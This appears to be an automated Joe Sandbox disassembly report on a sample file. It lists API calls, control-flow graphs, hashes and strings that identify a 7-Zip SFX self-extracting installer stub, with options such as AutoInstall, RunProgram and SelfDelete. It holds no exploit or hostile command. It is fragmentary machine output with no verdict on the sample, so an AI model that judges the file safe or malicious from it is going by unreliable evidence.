                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                                  • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                                  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                                  • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                                  • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                                • wsprintfW.USER32 ref: 00405595
                                                                • _wtol.MSVCRT ref: 004057DE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                                • CoInitialize.OLE32(00000000), ref: 004059E9
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                                • GetKeyState.USER32(00000010), ref: 00405AA1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                • memset.MSVCRT ref: 004060AE
                                                                • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                • _wtol.MSVCRT ref: 00405F65
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerWindowlstrcpymemcmpwsprintf$AttributesCloseCommandCreateCurrentDestroyDirectoryDispatchErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateVersionWait_wcsnicmpmemmovememsetwvsprintf
                                                                • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                • API String ID: 3696187633-3058303289
                                                                • Opcode ID: 819a16367885825f4e344e77836869b1f6d7740230357e2b02187f71ec59b593
                                                                • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                • Opcode Fuzzy Hash: 819a16367885825f4e344e77836869b1f6d7740230357e2b02187f71ec59b593
                                                                • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 701 4017a2-4017a8 695->701 702 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->702 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 701->704 705 4017aa-4017ad 701->705 702->660 706 4017dc-4017df 704->706 708 4017b6-4017c2 705->708 709 4017af-4017b1 705->709 710 4017e1-4017e3 call 403354 706->710 711 4017f8-4017ff call 40301a 706->711 708->706 709->693 714 4017e8-4017eb 710->714 715 401804-401809 711->715 714->697 716 4017f1-4017f3 714->716 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 744 4018d1-4018d9 739->744 745 4018db-4018f3 call 40db53 739->745 743 40188a-40189a ??3@YAXPAX@Z 740->743 746 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 743->746 747 40189c-40189e 743->747 744->743 753 4018f5-401904 GetLastError 745->753 754 401906-40190e ??3@YAXPAX@Z 745->754 746->660 747->746 753->743 754->729
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                                • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AttributesErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1799206407-0
                                                                • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                                • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                                APIs
                                                                • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                                • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: DiskFreeMessageSendSpace
                                                                • String ID:
                                                                • API String ID: 696007252-0
                                                                • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                                • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                • String ID: HpA
                                                                • API String ID: 801014965-2938899866
                                                                • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                                • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                • DispatchMessageW.USER32(?), ref: 00401B89
                                                                • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                • DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: MessageTimerWindow$CreateDestroyDispatchHandleKillModule
                                                                • String ID: Static
                                                                • API String ID: 1156981321-2272013587
                                                                • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                                                APIs
                                                                • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                                • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@memcpymemmove
                                                                • String ID:
                                                                • API String ID: 3549172513-3916222277
                                                                • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                                • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
